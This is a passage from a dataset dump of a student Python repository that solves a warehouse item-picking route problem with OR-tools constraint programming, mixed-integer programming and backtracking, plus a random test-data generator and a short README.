model.NewIntVar(0,maxd,'f')\nmodel.Add(f>=sum(x[i,j]*d[i%(M+1)][j%(M+1)] for i in range(M+2) for j in range(M+2) if i!=j))\n\n\n#khoi tao solver\nmodel.Minimize(f)\nsolver = cp_model.CpSolver()\nstatus = solver.Solve(model)\n\nrs = np.array([[0 for i in range(M+2)] for j in range(M+2)])\n\nif status == cp_model.OPTIMAL:\n print('Obj = %i' % solver.ObjectiveValue())\n\n for i in range(M+2):\n \tfor j in range(M+2):\n \t\tif i!=j:\n \t\trs[i][j] = solver.Value(x[i,j])\n# tim kiem lai duong di toi uu\ndef trace(M, rs):\n tmp = 0\n trace = [0]\n while True:\n for i in range(M+2):\n if i != tmp and rs[tmp,i] > 0:\n tmp = i\n break\n if tmp == M+1:\n break\n trace.append(tmp)\n \n return trace\n\n\nprint('trace: ',trace(M,rs))\nt = time.time() - t1\nprint('time: %.2f'%t)\n" }, { "alpha_fraction": 0.37042924761772156, "alphanum_fraction": 0.4062003195285797, "avg_line_length": 27.56818199157715, "blob_id": "f094ab73e94dc1bc9802fa4905b68f8143a585b6", "content_id": "1ea1ce6a852413e7a293c51c0a01c45dcf64dc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/gen.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import random as rd\n\ndef genData(fileName, N, M):\n with open(fileName, \"w\") as f:\n f.write(str(N) + \" \" + str(M) + \"\\n\")\n\n x = [0 for i in range(N)] # x[i]: total of all items i\n # Generate matrix Q: Q(i,j) is number of item i on table j\n\n for i in range(N):\n s = \"\"\n for j in range(M):\n c = rd.randint(1,15)\n x[i] = x[i] + c\n s = s + str(c) + ' '\n s = s + '\\n'\n f.write(s)\n\n # Generate matrix d: d(i,j) is distance between 2 point i and j\n d = [[0 for i in range(M+1)] for j in range(M+1)]\n \n for i in range(M+1):\n for j in range(i, M+1):\n if i != j:\n d[i][j] = d[j][i] = rd.randint(1, 15)\n \n for i in range(M+1):\n s = ''\n for j in range(M+1):\n s = s + str(d[i][j]) + ' '\n f.write(s + '\\n')\n \n\n # Generate a order include q(i): is number of item i, i = 1...N\n q = ''\n for i in range(N):\n c = rd.randint(1, x[i])\n q = q + str(c) + ' '\n f.write(q)\n f.close()\n\ngenData('test_5000_1000.txt',5000,1000)\n\n# genData('test_150_100.txt',150,100)\n\n" }, { "alpha_fraction": 0.5328732132911682, "alphanum_fraction": 0.5553941130638123, "avg_line_length": 26.23762321472168, "blob_id": "4c013a1148c9c051a70a260ede943d8ad1cfe48a", "content_id": "31b2b98acf56f711b796c92a8104f0de8d6d46d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2753, "license_type": "no_license", "max_line_length": 67, "num_lines": 101, "path": "/Project-optimal-CP.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.sat.python import cp_model\n\n#input\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nt1 = time.time()\nN,M,Q,d,q = input('test_30_10.txt')\n# xu ly du lieu\n# maxd la tong tat ca cac canh cua do thi duong di\nmaxd = 0\nfor i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n# total[i] la tong so luong cua moi mat hang i\ntotal = [0 for i in range(N)]\nfor i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n#model\n# variable\nmodel = cp_model.CpModel()\n# diem tiep theo cua hanh trinh tu i\nx = [model.NewIntVar(1,M+1,'x['+str(i)+']') for i in range(0,M+1)]\n# neu ke i duoc i duoc den thi y[i] =1 va nguoc lai\ny = [model.NewIntVar(0,1,'y['+str(i)+']') for i in range(0,M+2)]\n# tong quang duong tu 0 den diem i\nz = [model.NewIntVar(0,maxd,'z['+str(i)+']') for i in range(0,M+2)]\n\n#constraint\n#khoi tao gia bien\nmodel.Add(y[0]==1)\nmodel.Add(y[M+1]==1)\nmodel.Add(z[0]==0)\n#constraint 1\nfor i in range(M+1):\n\tmodel.Add(x[i]!=i)\n#constraint 2\nmodel.AddAllDifferent(x)\n#constraint 3\nfor i in range(M+1):\n for j in range(1,M+2):\n # x[i] = j => y[i] +y[j] =2\n b= model.NewBoolVar('b')\n model.Add(x[i]==j).OnlyEnforceIf(b)\n model.Add(x[i]!=j).OnlyEnforceIf(b.Not())\n model.Add(y[i]+y[j]==2).OnlyEnforceIf(b)\n#constraint 4\nfor i in range(M+1):\n for j in range(1,M+2):\n b= model.NewBoolVar('b')\n model.Add(x[i]==j).OnlyEnforceIf(b)\n model.Add(x[i]!=j).OnlyEnforceIf(b.Not())\n model.Add(z[i]+d[i%(M+1)][j%(M+1)]==z[j]).OnlyEnforceIf(b)\n#constraint 5\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) >= q[i])\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) <= total[i])\n\n#khoi tao solver\nmodel.Minimize(z[M+1])\nsolver = cp_model.CpSolver()\nstatus = solver.Solve(model)\n\nrs = [-1 for i in range(M+1)]\n\nif status == cp_model.OPTIMAL:\n print('Obj = %i' % solver.ObjectiveValue())\n for i in range(M+1):\n rs[i] = solver.Value(x[i])\n# tim kiem lai duong di toi uu\ndef trace(M,rs):\n trace = []\n tmp = 0\n while tmp != M+1:\n trace.append(tmp)\n tmp = rs[tmp]\n return trace\n\nprint('trace: ',trace(M,rs))\nt = time.time() - t1\nprint('time: %.2f'%t)\n\n\n" }, { "alpha_fraction": 0.46463021636009216, "alphanum_fraction": 0.4914255142211914, "avg_line_length": 26.31219482421875, "blob_id": "9057b58c312ce1a0e7327fa5b589960e54e31dc4", "content_id": "1adb5fa62a9b2649abd920afb1e2737848e39021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5598, "license_type": "no_license", "max_line_length": 85, "num_lines": 205, "path": "/ver2-mip.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.linear_solver import pywraplp\nimport numpy as np\n\n# Read data\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nC = 1000\n\ndef CreateSolverAndVariables(M, maxd):\n solver = pywraplp.Solver.CreateSolver('SCIP')\n\n x = {}\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n x[i, j] = solver.IntVar(0, 1, 'x('+str(i) +', '+str(j)+')')\n\n y = [solver.IntVar(0, 1, 'y('+str(i)+')') for i in range(M+2)]\n z = [solver.IntVar(0, maxd, 'z('+str(i)+')') for i in range(M+2)] # 0' === M+1\n return x, y, z, solver\n\n# Constraint 1: Default Constraints\ndef CreateConstraint1(solver, M, x, y, z):\n # y[0] = 1\n c = solver.Constraint(1,1)\n c.SetCoefficient(y[0],1)\n\n # y[M+1] = 1\n c = solver.Constraint(1,1)\n c.SetCoefficient(y[M+1],1)\n\n # tai diem M+1, luon co 1 luong di vao\n c = solver.Constraint(1,1)\n for i in range(1,M+1):\n c.SetCoefficient(x[i, M+1],1)\n\n # Tai diem 0, luon co 1 luong di ra\n c = solver.Constraint(1,1)\n for i in range(1,M+1):\n c.SetCoefficient(x[0,i],1)\n \n c = solver.Constraint(0,0)\n c.SetCoefficient(z[0],1)\n\n# Constraint 2\n# x[i,j] = 1 -> y[i] + y[j] = 2\ndef CreateConstraint2(solver, M, x, y):\n for i in range(1,M+1):\n for j in range(1,M+1):\n if i != j:\n solver.Add(y[i]+y[j] + C*(1-x[i,j]) >= 2)\n solver.Add(y[i]+y[j] + C*(x[i,j]-1) <= 2)\n\n# Constraint 3 and 4\ndef CreateConstraint3and4(solver, M, x, y):\n # y[i] = 1 --> sum(x[i,j]) (j=1->M+1) = sum(x[j,i]) (j=0->M) = 1 voi moi i =1..M\n for i in range(1,M+1):\n c = solver.Constraint(1-C, C)\n c.SetCoefficient(y[i], -C)\n for j in range(1,M+2):\n if i != j:\n c.SetCoefficient(x[i,j], 1)\n \n c = solver.Constraint(-C,1+C)\n c.SetCoefficient(y[i], C)\n for j in range(1,M+2):\n if i != j:\n c.SetCoefficient(x[i,j], 1)\n\n c = solver.Constraint(1-C, C)\n c.SetCoefficient(y[i], -C)\n for j in range(M+1):\n if i != j:\n c.SetCoefficient(x[j,i], 1)\n \n c = solver.Constraint(-C,1+C)\n c.SetCoefficient(y[i], C)\n for j in range(M+1):\n if i != j:\n c.SetCoefficient(x[j,i], 1)\n\n# Constraint 5\n# x[i,j] = 1 -> z[j] = z[i] + d[i,j]\ndef CreateConstraint5(solver,M,x,z,d):\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n solver.Add(z[j] + C*(1-x[i,j]) >= z[i]+d[i%(M+1)][j%(M+1)])\n solver.Add(z[j] + C*(x[i,j]-1) <= z[i]+ d[i%(M+1)][j%(M+1)])\n\n\n# Constraint 6: quantity constraints\ndef CreateConstraint6(solver, M, N, y, q, Q, total):\n for i in range(N):\n c = solver.Constraint(q[i], total[i])\n for j in range(1,M+1):\n c.SetCoefficient(y[j%(M+1)], Q[i][j%(M+1)])\n\n\ndef CreateObjective(solver, M, x, d):\n obj = solver.Objective()\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n obj.SetCoefficient(x[i,j], d[i%(M+1)][j%(M+1)])\n \n obj.SetMinimization()\n\ndef Trace(M, rs):\n tmp = 0\n trace = [0]\n while True:\n for i in range(M+2):\n if i != tmp and rs[tmp,i] > 0:\n tmp = i\n break\n if tmp == M+1:\n break\n trace.append(tmp)\n \n return trace\n\ndef ComputeItems(M, N, Q, y):\n rs = [0 for i in range(N)]\n for i in range(N):\n for j in range(M+1):\n if y[j].solution_value() > 0:\n rs[i] = rs[i] + Q[i][j]\n return rs\n\ndef PrintSol(M, rs):\n trace = Trace(M, rs)\n print(\"Route:\", trace)\n\n\ndef Solve(M, N, q, Q, d, total, maxd):\n x, y, z, solver = CreateSolverAndVariables(M, maxd)\n CreateConstraint1(solver, M, x, y, z)\n CreateConstraint2(solver, M, x, y)\n CreateConstraint3and4(solver, M, x, y)\n CreateConstraint5(solver, M, x, z, d)\n CreateConstraint6(solver, M, N, y, q, Q, total)\n CreateObjective(solver, M, x, d)\n\n result_status = solver.Solve()\n\n # The problem has optimal solution.\n assert result_status == pywraplp.Solver.OPTIMAL\n print('Objective =', solver.Objective().Value())\n\n rs = np.array([[0 for i in range(M+2)] for j in range(M+2)])\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n rs[i, j] = x[i,j].solution_value()\n \n # print z[i]\n # for i in range(M+2):\n # print('z['+str(i)+'] =', z[i].solution_value())\n\n return rs\n\ndef main():\n t1 = time.time()\n N, M, Q, d, q = input('test_100_80.txt')\n total = [0 for i in range(N)]\n for i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n\n maxd = 0\n for i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n rs = Solve(M, N, q, Q, d, total, maxd)\n PrintSol(M,rs)\n\n # print('Order:', q)\n # print('So luong:', ComputeItems(M, N, Q, y))\n t2 = time.time()\n \n print('Time:',round(t2-t1, 2), 'seconds')\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.43293794989585876, "alphanum_fraction": 0.450273722410202, "avg_line_length": 25.409639358520508, "blob_id": "951c4a7bcff5d274aa38c30ed5a7bec01bc997dc", "content_id": "081e7c1ac64c79091136dd7a4b22780dfca960d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2192, "license_type": "no_license", "max_line_length": 80, "num_lines": 83, "path": "/ver1-backtracking.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "\nimport time\n\n# Read data\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\ndef check(v):\n if not visited[v]:\n for i in range(N):\n if q[i] > 0 and Q[i][v] > 0:\n return True\n return False\n\ndef checkStop():\n for i in range(N):\n if q[i] != 0:\n return False\n return True\n\ndef solution(k):\n global idx\n global minDistance\n if minDistance > curDistance + d[x[k]][0]:\n minDistance = curDistance + d[x[k]][0]\n idx = k+1\n rs[:k+1] = x[:k+1]\n\ndef TRY(k):\n global q, curDistance\n for v in range(1, M+1):\n if check(v):\n x[k] = v\n\n # Update\n curDistance = curDistance + d[x[k-1]][x[k]]\n visited[v] = True\n r = [0 for i in range(N)] # r[i]: la so luong san pham i lay o ban v\n for i in range(N):\n r[i] = min(Q[i][v], q[i])\n q[i] = q[i] - r[i]\n \n if checkStop():\n solution(k)\n if curDistance < minDistance:\n TRY(k+1)\n\n # Recover\n curDistance = curDistance - d[x[k-1]][x[k]]\n visited[v] = False\n for i in range(N):\n q[i] = q[i] + r[i]\n\n\nt1 = time.time()\nN, M, Q, d, q = input('test_30_15.txt')\nx = [0 for i in range(M+1)] # x[i]: i-th destination\nvisited = [False for i in range(M+1)] # visited[i] = True if went to i\ncurDistance = 0 \nminDistance = 1e9\nrs = [0 for i in range(M+1)] # result\nidx = 0\nTRY(1)\nprint(\"Objective:\", minDistance)\nprint(\"Route:\", rs[:idx])\nt2 = time.time()\nprint('Time:',t2-t1, 'seconds')" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.666666984558105, "blob_id": "8972d102e1b7d83e4952ed527ecb0694e20b21ba", "content_id": "bb2be360950b6e4bf0676c008cc1d4913a36b1d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 34, "num_lines": 12, "path": "/README.md", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "# `Generate data input`\n\n- gen.py\n\n\n# `Version 1`: Back tracking\n\n- ver1-backtracking.py\n\n# `Version 2`: Mix Integer Program\n\n- ver2-mip.py\n\n" } ]
6
pavlicic1marko/Python_for_web
https://github.com/pavlicic1marko/Python_for_web
8f29bc8c4bdcb47859151e8a4fa1d57490ed2b3c
e5a4f08de456ddf14803c92adde671bce81870e9
16ffe9f0c82ef851102dceb25c89645277b37c1f
refs/heads/master
2020-03-28T09:25:33.477668
2019-01-08T21:02:09
2019-01-08T21:02:09
148,035,835
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6146666407585144, "alphanum_fraction": 0.624666690826416, "avg_line_length": 20.35714340209961, "blob_id": "7a9bcf288f570087ad361a6d7ae842763e204600", "content_id": "7406b9389a08d51542370896e95296253425740f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1500, "license_type": "no_license", "max_line_length": 68, "num_lines": 70, "path": "/SQLite_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import sqlite3\n\nconn = sqlite3.connect('music.sqlite')\ncur = conn.cursor()\n\ncur.execute('DROP TABLE IF EXISTS Tracks')\ncur.execute('CREATE TABLE Tracks (title TEXT, plays INTEGER)')\n\nconn.close()\n\n\n\n\n\nimport sqlite3\n\nconn = sqlite3.connect('music.sqlite')\ncur = conn.cursor()\n\ncur.execute('INSERT INTO Tracks (title, plays) VALUES (?, ?)', \n ('Thunderstruck', 20))\ncur.execute('INSERT INTO Tracks (title, plays) VALUES (?, ?)', \n ('My Way', 15))\nconn.commit()\n\nprint('Tracks:')\ncur.execute('SELECT title, plays FROM Tracks')\nfor row in cur:\n print(row)\n\ncur.execute('DELETE FROM Tracks WHERE plays < 100')\n\ncur.close()\n\n\n\n\n\n\n\ncur.execute('''INSERT OR IGNORE INTO Artist (name) \n VALUES ( ? )''', ( artist, ) )\n cur.execute('SELECT id FROM Artist WHERE name = ? ', (artist, ))\n artist_id = cur.fetchone()[0]\n\n cur.execute('''INSERT OR IGNORE INTO Album (title, artist_id) \n VALUES ( ?, ? )''', ( album, artist_id ) )\n cur.execute('SELECT id FROM Album WHERE title = ? ', (album, ))\n album_id = cur.fetchone()[0]\n\n cur.execute('''INSERT OR REPLACE INTO Track\n (title, album_id, len, rating, count) \n VALUES ( ?, ?, ?, ?, ? )''', \n ( name, album_id, length, rating, count ) )\n\n conn.commit()\n\n\nimport sqlite3\n\nconn = sqlite3.connect('my_db.sqlite')\ncur = conn.cursor()\n\ncur.executescript('''\nDROP TABLE IF EXISTS User;\n\nCREATE TABLE User (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT UNIQUE);\n''')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6318234801292419, "alphanum_fraction": 0.6440185904502869, "avg_line_length": 29.210525512695312, "blob_id": "43396b602b0b990b76d87aef14b3cdb92e5d3f09", "content_id": "af51630661af4479366ecb79aee10b9249241801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1722, "license_type": "no_license", "max_line_length": 82, "num_lines": 57, "path": "/Download_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import urllib.request\nurllib.request.urlretrieve(\"https://grad.ucla.edu/asis/agep/advcv.pdf\",\"new.pdf\")\n\nimport urllib.request, urllib.parse, urllib.error\nimg = urllib.request.urlopen('https://viphouse.rs/products/27031/6360.jpg').read()\nfhand = open('6360.jpg', 'wb')\nfhand.write(img)\nfhand.close()\n\nimport requests\nfrom b4 import BeautifulSoup\ndef trade_spider(max_pages):\n page = 1\n while page <= max_pages:\n url = 'https://buckysroom.org/trade/search.php?page=' + str(page)\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for link in soup.findAll('a', {'class': 'item-name'}):\n href = \"https://buckysroom.org\" + link.get('href')\n title = link.string\n print(href)\n print(title)\n page += 1 \ntrade_spider(1)\n\nimport requests\nfrom b4 import BeautifulSoup\n\n\ndef trade_spider(max_pages):\n page = 1\n while page <= max_pages:\n url = 'https://buckysroom.org/trade/search.php?page=' + str(page)\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for link in soup.findAll('a', {'class': 'item-name'}):\n href = \"https://buckysroom.org\" + link.get('href')\n title = link.string\n # print(href)\n # print(title)\n get_single_item_data(href)\n page += 1\n \n\ndef get_single_item_data(item_url):\n source_code = requests.get(item_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for item_name in soup.findAll('div', {'class': 'i-name'}):\n print(item_name.string)\n for link in soup.findAll('a'):\n href = \"https://buckysroom.org\" + link.get('href')\n print(href)\n\ntrade_spider(3)\n" }, { "alpha_fraction": 0.6393939256668091, "alphanum_fraction": 0.6393939256668091, "avg_line_length": 35.44444274902344, "blob_id": "52dcd2d61ed53c9630e2baa01c80173b8e6de42f", "content_id": "9741e6caa58ad84bb61347990ecd7a3716a227ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 330, "license_type": "no_license", "max_line_length": 81, "num_lines": 9, "path": "/RE_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import re\ntext = open(\"re.txt\")\nfor line in text:\n line = line.rstrip()\n if re.search('ovo je bitno', line): #ako postoji ovaj string ,vraca True\n print(line)\n if re.search('^ovo je bitno', line): #ako pocinje\n print(line)\n print( re.findall('[gG]', line))#vraca listu,praznu ili sa nekoliko elemenata\n\n\n" }, { "alpha_fraction": 0.744911789894104, "alphanum_fraction": 0.75780189037323, "avg_line_length": 25.799999237060547, "blob_id": "117bf99afc7f4a8b8b4665af2d8282c8e2190418", "content_id": "a0acc052462dc6828c7cd855853ace796844694a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1474, "license_type": "no_license", "max_line_length": 112, "num_lines": 55, "path": "/Selenium_Python_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "__author__=\"ME\"\nimport time\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"G:\\\\chromedriver_win32\\\\chromedriver.exe\") #location of the fail\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://www.youtestme.com/\")\ndriver.implicitly_wait(20)\ntime.sleep(3)\ndriver.get_screenshot_as_file(\"youtestme.png\")\ntime.sleep(3)\ndriver.quit()\n\n\n__author__=\"ME\"\nimport time\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"D:\\\\chromedriver.exe\") #location of the fail\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://google.com\")\ndriver.find_element_by_name(\"q\").send_keys(\"Automation\") #q is the valu for the name atribute of the search bar\ntime.sleep(4)\ndriver.find_element_by_name(\"btnK\").click()\ntime.sleep(4)\ndriver.quit()\n\n\n\n__author__=\"ME\"\nimport time\nimport re\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"D:\\\\chromedriver.exe\") #location of the fail\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://google.com\")\ndoc=driver.page_source\nprint(doc)\n\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\ndriver=webdriver.Chrome(\"G:\\\\chromedriver_win32\\\\chromedriver.exe\") #location of the fail\ndriver.set_page_load_timeout(30)\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nprint(elem)\nelem.clear()\nprint(elem)\nelem.send_keys(\"pycon\")\nprint(elem)\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\nprint(elem[1])\ndriver.close()\n" }, { "alpha_fraction": 0.7074829936027527, "alphanum_fraction": 0.7327502369880676, "avg_line_length": 45.772727966308594, "blob_id": "3eeaf3cd6bec19f55954aa1384b4091cb8de5a0d", "content_id": "e57b4259c525147aa3ab50c12cf870f9fc305e63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 141, "num_lines": 22, "path": "/Download_single_stock.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.core.common.is_list_like= pd.api.types.is_list_like\nimport pandas_datareader.data as web\nimport datetime\n\nstock1=input(\"enter stock1 symbol(example: AMZN)\") #user input\ntime1=[int(x) for x in input(\"maximum interval for analysis is six months,enter the start time: year moth date(example: 2008 6 1)\",).split()]\ntime2=[int(x) for x in input(\"enter the end time,: year moth date(example: 2009 3 31)\",).split()]\nstart_date=datetime.datetime(*time1)\nend_date=datetime.datetime(*time2)\n\ndef get_price_history(stock_symbol,start_date,end_date):\n dff = web.DataReader(stock_symbol, 'quandl', start_date, end_date) #use quandl, yahoo and google do not work\n dff.reset_index(inplace=True)\n dff.set_index(\"Date\", inplace=True)\n dff[\"of_first_value\"]=dff[\"AdjClose\"]/dff.iloc[-1][\"AdjClose\"]*100 #add a column\n return dff\n\ndf=get_price_history(stock1,start_date,end_date)\ntable_name=stock1\nconn ='sqlite:///full_stock_data2.db'#database name\ndf.to_sql(table_name, conn, if_exists='append', index=True)\n" } ]
5
0xJinbe/Exercicios-py
https://github.com/0xJinbe/Exercicios-py
4836567117ddbde1190ca4a4cd7cd7450eb6d2d5
a374488f0a44413e5480f7dfce3e34639e2ade6a
d2bfa555da6f82e7bf8506eb7b8cacbd2014ce6b
refs/heads/master
2023-06-29T21:56:26.906499
2021-08-04T16:32:59
2021-08-04T16:32:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6770538091659546, "alphanum_fraction": 0.7327667474746704, "avg_line_length": 36.85714340209961, "blob_id": "5c159a67590cdad21fe64ac1b7b3bd74fa6bd74e", "content_id": "8616106226a9bd06ed3a029a95118ae21a3dc6db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1077, "license_type": "no_license", "max_line_length": 159, "num_lines": 28, "path": "/Ex 016.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contraram para desenvolver o programa que calculará os reajustes.\nFaça um programa que recebe o salário de um colaborador e o reajuste segundo o seguinte critério, baseado no salário atual:\nsalários até R$ 280,00 (incluindo) : aumento de 20%\nsalários entre R$ 280,00 e R$ 700,00 : aumento de 15%\nsalários entre R$ 700,00 e R$ 1500,00 : aumento de 10%\nsalários de R$ 1500,00 em diante : aumento de 5% Após o aumento ser realizado, informe na tela:\no salário antes do reajuste;\no percentual de aumento aplicado;\no valor do aumento;\no novo salário, após o aumento.\"\"\"\n\nsalario = float(input('Salário: '))\n\nif salario <= 280:\n percentual = 20\nelif salario <= 700:\n percentual = 15\nelif salario <= 1500:\n percentual = 10\nelse:\n percentual = 5\n\nprint('Salario original: ', salario, 'Percentual: ', percentual)\n\nvalor_aumento = (salario * percentual) / 100\nnovo_sal = valor_aumento + salario\n\nprint('Valor aumento: ', valor_aumento, 'Novo salario: ', novo_sal)" }, { "alpha_fraction": 0.6620278358459473, "alphanum_fraction": 0.6779323816299438, "avg_line_length": 27, "blob_id": "302ec5fa44331c4940ea1d88177c23c26e8166b0", "content_id": "634e3ced4648f40620210c586f587e4c9e1ae6eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 125, "num_lines": 18, "path": "/Ex 043.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que receba dois números inteiros e gere os números inteiros que estão no intervalo compreendido por eles.\n\"\"\"\n\nn1 = int(input('Escreva n1: '))\nn2 = int(input('Escreva n2: '))\n\nfor i in range(n1, n2, 1):\n print(i)\n\n#Altere o programa anterior para mostrar no final a soma dos números.\n\ninicio = int(input(\"digite o inicio do intervalo-->\"))\nfim = int(input(\"digite o fim do intervalo-->\"))\nlista = []\nfor i in range (inicio, fim, 1):\n lista.append(i)\n s = sum(lista)\nprint(s)" }, { "alpha_fraction": 0.5959780812263489, "alphanum_fraction": 0.6014625430107117, "avg_line_length": 23.952381134033203, "blob_id": "ecd6e8da299d2af310e07c306fea9e9369478cef", "content_id": "ed196fd1b71168dfd8a77240e79b2a01eceb5c47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 74, "num_lines": 21, "path": "/Ex 055.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o mostre a média aritmética de N notas.\"\"\"\r\n\r\nn = int(input('Digite a quantidade de notas que deseja calcular: '))\r\ncount = 0\r\nl = []\r\n\r\nwhile count < n:\r\n l.append(float(input('Digite o valor da nota: ')))\r\n count += 1\r\n\r\nprint(f\"A média de todas as notas é: {sum(l)/len(l)}\")\r\n\r\n\r\n\"\"\"n = float(input('Entre com as notas a serem calculadas: '))\r\nl = []\r\n\r\nwhile n > 0:\r\n n = float(input('Entre com as notas a serem calculadas: '))\r\n l.append(n)\r\n\r\nprint(f\"A medias das notas é: {sum(l)/len(l)}\")\"\"\"\r\n\r\n" }, { "alpha_fraction": 0.6483957171440125, "alphanum_fraction": 0.6724599003791809, "avg_line_length": 42.117645263671875, "blob_id": "0951bfe3b093002c8d08eea434436ddef7dfc494", "content_id": "85c06ca25b9edd9740e9e7af464491bd03b35372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "no_license", "max_line_length": 248, "num_lines": 17, "path": "/Ex 056.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça para n pessoas a sua idade, ao final o programa devera verificar se a média de idade da turma varia entre 0 e 25,26 e 60 e maior que 60; e então, dizer se a turma é jovem, adulta ou idosa, conforme a média calculada.\"\"\"\r\n\r\nn = int(input('Quantas pessoas participarão da turma? '))\r\ncount = 0\r\nl = []\r\n\r\nwhile count < n:\r\n count += 1\r\n l.append(int(input('Qual a idade a ser calculada? ')))\r\n\r\nmedia = sum(l)/len(l)\r\nif 0 < media and media < 25:\r\n print(f\"A media da turma é {media}. A turma se classifica como JOVEM\")\r\nelif media > 26 and media < 60:\r\n print(f\"A media da turma é {media}. A turma se classifica como ADULTA\")\r\nelse:\r\n print(f\"A media da turma é {media}. A turma se classifica como IDOSA\")" }, { "alpha_fraction": 0.6550324559211731, "alphanum_fraction": 0.673701286315918, "avg_line_length": 34.20000076293945, "blob_id": "e66cd0ddbbb8e4b3c313409459d659e3fe67c053", "content_id": "6f0098f047abd2efa21b3924f107d9a36d47c01d", "detected_licenses": [], "is_generated": false, 